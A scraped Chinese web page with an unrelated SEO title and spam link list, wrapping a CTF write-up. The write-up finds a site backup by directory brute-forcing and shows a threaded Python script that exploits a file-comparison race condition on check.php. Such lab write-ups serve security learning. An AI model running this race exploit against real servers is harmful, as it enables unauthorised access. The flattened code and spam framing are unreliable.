当前位置: 首页 > news >正文

网站导航条模板seo的作用有哪些

网站导航条模板,seo的作用有哪些,谷歌网站怎么做推广,施工企业安全形势分析会0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典,这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份,备份的是check.php.bak 然后接着看,可以看到这里不太可能是sql注入,有…

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

在这里插入图片描述

0x02 Write Up

首先跑一下字典,这里用的dirmap,可以看到有一个web.zip

在这里插入图片描述
下载下来之后发现是一个网站备份,备份的是check.php.bak

然后接着看,可以看到这里不太可能是sql注入,有一个请求 check.php?token="+token+"&php://input"

在这里插入图片描述
正好接着上一个文件备份的内容,看一下源码

在这里插入图片描述
首先token是将date("i")进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat

直接访问进行下载即可。

原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件

import requests
import time
import hashlib
import threadingi=str(time.localtime().tm_min)
m=hashlib.md5(i.encode()).hexdigest()def go_to(data):try:url=f"http://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token={m}&php://input"s=requests.post(url,data=data)print(s.text)except Exception as e:passwith open('key.dat','rb') as t:data1=t.read()pass
for i in range(20):threading.Thread(target=go_to,args=(data1,)).start()
for i in range(20):data2='abbcd'threading.Thread(target=go_to,args=(data2,)).start()

在这里插入图片描述

以上

http://www.yidumall.com/news/21425.html

相关文章:

  • 怎样将自己做的网页加入网站网络营销与直播电商
  • 网站 优化 日志网站申请流程
  • 学做网站多久能学会媒介
  • 行业网站联盟湖南关键词排名推广
  • 深圳网站建设者宣传广告怎么做吸引人
  • 有什么网上做c 的网站站长工具查询seo
  • 建设银行网站怎么交学费百度主页入口
  • 做外贸 访问国外网站 怎么办免费发广告的平台
  • 站长之家端口扫描爱站网长尾关键词
  • wordpress批量改数据库前缀化工网站关键词优化
  • 南宁网站建设哪里有如何创建个人网页
  • 广州中学生网站制作seo岗位
  • 高端建网站重庆森林电影
  • 网站免费模板整合营销策略
  • 网站数据每隔几秒切换怎么做的黑帽seo论坛
  • 测试本机与网站连接应该怎么做网站提交入口链接
  • 兰州七里河吴中seo页面优化推广
  • 住房和城乡建设部部长黑帽seo优化推广
  • 如何建单页网站栏目武汉百度推广多少钱
  • 上海雍熙网站seo课设
  • 开源低代码平台做seo有什么好处
  • 网站如何做团购杭州seo公司排名
  • 电子商务网站开发代码产品宣传推广策划
  • 找公司做网站需要咨询什么问题360收录批量查询
  • 深圳苏州企业网站建设服务商营销系统
  • 重庆网站的推广方式小程序seo
  • wordpress新浪seo优化托管
  • php移动网站开发商城网站建设
  • 做网站维护需要学什么短视频培训要多少学费
  • 做网站文字编辑工作好不好steam交易链接可以随便给别人吗